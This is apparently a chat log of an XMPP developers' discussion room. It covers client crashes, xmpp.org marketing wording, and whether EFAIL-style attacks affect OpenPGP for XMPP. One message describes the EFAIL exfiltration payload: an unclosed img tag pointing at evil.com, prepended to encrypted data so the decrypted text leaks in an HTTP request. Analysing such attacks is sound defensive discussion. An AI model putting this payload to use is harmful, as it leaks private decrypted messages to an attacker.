XSF Discussion - 2018-05-16

  1. MattJ

    Wow, Swift just crashed my Pulseaudio :)

  2. MattJ

    and then crashed itself

  3. MattJ

    Looks like one of my local test accounts had a $large number of offline messages

  4. Ge0rG

    ,oO( https://op-co.de/tmp/chatsecure-crash-iphone.mp4 )

  5. MattJ

    Nice :)

  6. MattJ

    It's like winning Solitaire

  7. jonasw


  8. jonasw

    how do a lot of offline messages crash pulseaudio.

  9. MattJ

    jonasw, notification sound. I think it probably tried to play thousands of them at once

  10. jonasw

    and opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.

  11. jonasw

    but still a bug in pulse probably :)

  12. MattJ


  13. flow

    > jonasw> but still a bug in pulse probably :)

  14. flow

    not sure if lennart would agree

  15. jonasw

    AFAIK lennart isn’t involved with pulse anymore

  16. Zash

    I'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.

  17. jonasw

    I feel you

  18. debacle

    Recently I complained about xmpp.org advertising XMPP as "most secure" messaging standard. Some people agreed, that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt, that XMPP is exceptionally secure :~)

  19. debacle

    I suggest to replace "most secure" with the word "universal".

  20. Zash

    Secure in its awesomeness

  21. Seve/SouL


  22. Seve/SouL

    that's the idea for me

  23. debacle

    I believe, that the most important aspect of XMPP compared to other, similar technologies is it's "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.

  24. Seve/SouL

    Something that would mean in a way 'the standard'

  25. Seve/SouL

    I like that

  26. daniel

    The literal battle tested might also not fly well with some people...

  27. Zash

    The Standard.

  28. Seve/SouL


  29. Zash

    It's probably fine for it to be bold

  30. debacle

    "Battle-tested" might also be something to change, true.

  31. Zash

    What was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.

  32. Zash

    debacle: That might actually be true in a literal sense.

  33. daniel

    Zash: that's the problem

  34. debacle

    Yes, but do you want to use this use case for the ads? :~)

  35. debacle

    Pacifists or anti-bellicists might go to Matrix then :~)

  36. daniel

    I mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience

  37. debacle

    XEPs are lethal in some way...

  38. Zash

    XEPs don't kill people. People kill people.

  39. daniel

    That would make for a better slogan

  40. Kev

    I raised the tagline at the time. It was a deliberate decision by (then) Board.

  41. debacle

    Back to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)

  42. Zash


  43. debacle

    Maybe also s/Battle-tested./Secure./ :

  44. debacle

    Maybe also s/Battle-tested./Secure./ ?

  45. Zash

    Why not have bold marketing tho?

  46. debacle


  47. daniel

    Not everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing

  48. Zash

    All publicity is good publicity, as they say

  49. debacle

    The EFFail was no good marketing, neither for PGP nor EFF.

  50. Zash

    When everyone has forgotten the details, they might remember "PGP". If so, then it was a success.

  51. vanitasvitae

    I should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.

  52. Kev

    If people read the details, they'd see it had nothing to do with pgp in the first place :)

  53. debacle

    The remember "PGP is dangerous, I must uninstall it and replace with Signal"

  54. debacle

    They remember "PGP is dangerous, I must uninstall it and replace with Signal"

  55. Zash

    vanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible

  56. vanitasvitae

    Zash, no, it was also about PGP

  57. vanitasvitae

    PGP was just harder to attack

  58. moparisthebest

    not really, it was an HTML thing, you know, like xhmtl-im

  59. daniel

    If you put xhtml in your ox one could maybe do something similar

  60. daniel

    Under some conditions

  61. daniel

    If you implemted both xhtml and your ox in a bad way that is

  62. vanitasvitae

    daniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.

  63. vanitasvitae

    But I have to evaluate that in more depth

  64. Zash

    If you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here

  65. daniel

    Yeah I think you could deliberately Design and implemted ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza

  66. MattJ

    debacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there

  67. debacle

    MattJ, will do, thanks!

  68. vanitasvitae

    by the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D

  69. Zash

    As long as messages are either encrypted or not, it should be fine

  70. Wiktor

    who would've though using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/

  71. Zash

    Nah, who cares, kill XHTML

  72. Zash

    XHTML is dead, long live tag soup!

  73. Wiktor

    yep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death

  74. Zash

    Nah, XHTML 2 was bad because it fixed stupid early mistakes in HTML

  75. Zash

    Like a single <h> instead of <h[1-6]>

  76. Wiktor

    single <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/

  77. Link Mauve

    Wiktor, s/green/yellow/ :p

  78. Wiktor

    Link Mauve: yes, lol, I've imagined yellow but said green, weird

  79. moparisthebest

    I miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer

  80. moparisthebest

    because the img width/height were too large of integers...

  81. Wiktor

    deathpic.png, sounds dangerous

  82. Link Mauve

    This is scary at so many levels.

  83. Link Mauve

    Why would parsing an HTML integer trigger a kernel panic.

  84. moparisthebest

    yea everyone thought it was the image, it wasn't, it's an overflow with the tags :)

  85. moparisthebest

    Link Mauve, right? :)

  86. moparisthebest

    I want to say it was vulnerable to windows xp sp1, then sp2 fixed it

  87. Ge0rG

    "vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?

  88. moparisthebest

    are there any XSD wizards in here that could tell me if according to this schema if I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property

  89. moparisthebest

    like <Link bla><Property type="something">data1</Property><Property type="something">data2</Property></Link> ?

  90. moparisthebest

    http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>

  91. moparisthebest

    so I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)

  92. jonasw

    moparisthebest, I’m rather sure that XSD can’t express such things

  93. moparisthebest

    thanks jonasw , as an aside you've been doing an exceptional job as editor lately

  94. jonasw


  95. pep.

    only lately, before that it was crap

  96. lovetox